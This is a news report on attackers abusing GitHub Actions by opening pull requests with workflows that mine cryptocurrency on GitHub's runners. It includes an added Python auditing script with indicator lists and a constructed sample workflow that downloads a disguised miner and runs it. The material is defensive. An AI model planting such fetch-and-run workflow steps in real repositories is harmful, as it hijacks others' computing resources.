Dutch cyber security specialist Justin Perdok discovered that at least one hacker is abusing the CI/CD function of GitHub Actions to force the company's servers to mine cryptocurrency. Such attacks do not appear to harm user projects in any way, but they place a heavy load on GitHub's infrastructure.
– Justin Perdok (@JustinPerdok) April 2, 2021
Interestingly, Perdok was not the first to notice such attacks; he only drew attention to the problem. The first to discover them was a French researcher known as Tib, who wrote that the attacks began back in November 2020 and continue to this day.
Perdok says that everything is based on forking a legitimate repository, adding malicious GitHub Actions workflows to the source code, and then sending a Pull Request to merge the code back into the original.
At the same time, the hacker does not rely on luck: the owner of the original project does not have to approve the malicious Pull Request at all. Perdok says that merely opening the Pull Request is enough for the attack to work. According to the specialist, attackers therefore specifically target repository owners who use workflow automation, that is, who check incoming Pull Requests with automated jobs.
As a result, after the malicious request is sent, GitHub's systems process the attacker's code and launch a virtual machine that downloads and runs cryptocurrency mining software on GitHub's infrastructure. Experts say that the miner disguises itself as npm.exe and communicates with the turtlecoin.herominers.com pool.
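As an added defensive example (not code from the article or from any of the researchers it cites), the following Python script audits a GitHub Actions workflow file for the pattern described above: a pull_request trigger combined with run steps that fetch and execute a binary or reference the indicators the report names. The sample workflow, the regex heuristics and the line-based `run:` extraction are constructed assumptions; a real YAML parser would be more robust.

```python
import re
INDICATORS = {  # finding -> substrings; pool domain and miner names from the article
    "references a known mining pool domain": ("herominers.com",),
    "references a miner binary or its disguised name": ("npm.exe", "xmrig")}
# Heuristic: a pull_request trigger lets a fork's PR start this job on upstream runners.
PR_TRIGGER_RE = re.compile(
    r"^(?:on:\s*(?:\[[^\]]*)?|\s*-\s*|\s+)pull_request(?:_target)?\b", re.M)
DOWNLOAD_RE = re.compile(r"\b(?:curl|wget|Invoke-WebRequest|iwr)\b", re.I)
EXEC_RE = re.compile(r"chmod \+x|\./\S+|\.exe\b", re.I)

def extract_run_steps(workflow_text):
    # Return the shell text of every `run:` step (inline or block scalar).
    steps, lines, i = [], workflow_text.splitlines(), 0
    while i < len(lines):
        m = re.match(r"^(\s*)-?\s*run:\s*(.*)$", lines[i])
        i += 1
        if m:
            indent, rest = len(m.group(1)), m.group(2).strip()
            if rest in ("|", ">", "|-", ">-"):  # block scalar: lines indented deeper
                block = []
                while i < len(lines) and (not lines[i].strip() or len(lines[i]) - len(lines[i].lstrip()) > indent):
                    block.append(lines[i].strip())
                    i += 1
                rest = "\n".join(block)
            steps.append(rest)
    return steps

def audit_workflow(workflow_text):
    # Return human-readable findings for one workflow file's text.
    findings = []
    if PR_TRIGGER_RE.search(workflow_text):
        findings.append("runs on pull_request: a fork's PR can start this job")
    for step in extract_run_steps(workflow_text):
        low = step.lower()
        for finding, needles in INDICATORS.items():
            if any(n in low for n in needles):
                findings.append(finding)
        if DOWNLOAD_RE.search(step) and EXEC_RE.search(step):
            findings.append("downloads and executes a file in one step")
    return findings
# Constructed sample workflow mimicking the reported pattern (not from a real repo).
SAMPLE_WORKFLOW = """\
on: [pull_request]
jobs:
  test:
    steps:
      - run: |
          curl -sL https://example.invalid/npm.exe -o npm.exe
          chmod +x npm.exe && ./npm.exe turtlecoin.herominers.com
"""
```

Run `audit_workflow` over every file under `.github/workflows/` in an incoming PR's head branch; any finding beyond the trigger note is worth holding the job until a maintainer has reviewed the diff.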
Perdok writes that he himself fell victim to the cybercriminals and watched them use up to 100 miners in a single attack.
The expert believes the hackers operate indiscriminately and at scale: for example, he identified at least one account creating hundreds of Pull Requests with malicious code.
GitHub representatives have already told the media that they are aware of what is going on and are actively investigating these mining abuses. However, the company gave the same answer to the French engineer last year.
Apparently, while the company fights the hacker by blocking his accounts, the attacker simply registers new ones as soon as the old ones are discovered and banned.
Even worse, Bleeping Computer reports that after these attacks were publicized, copycats appeared who abuse the same methods and use GitHub's infrastructure for mining. For example, one copycat sent over 50 malicious requests to legitimate repositories. According to the publication, the copycats use the open source XMRig miner and do not hesitate to download it directly from its official repository on GitHub.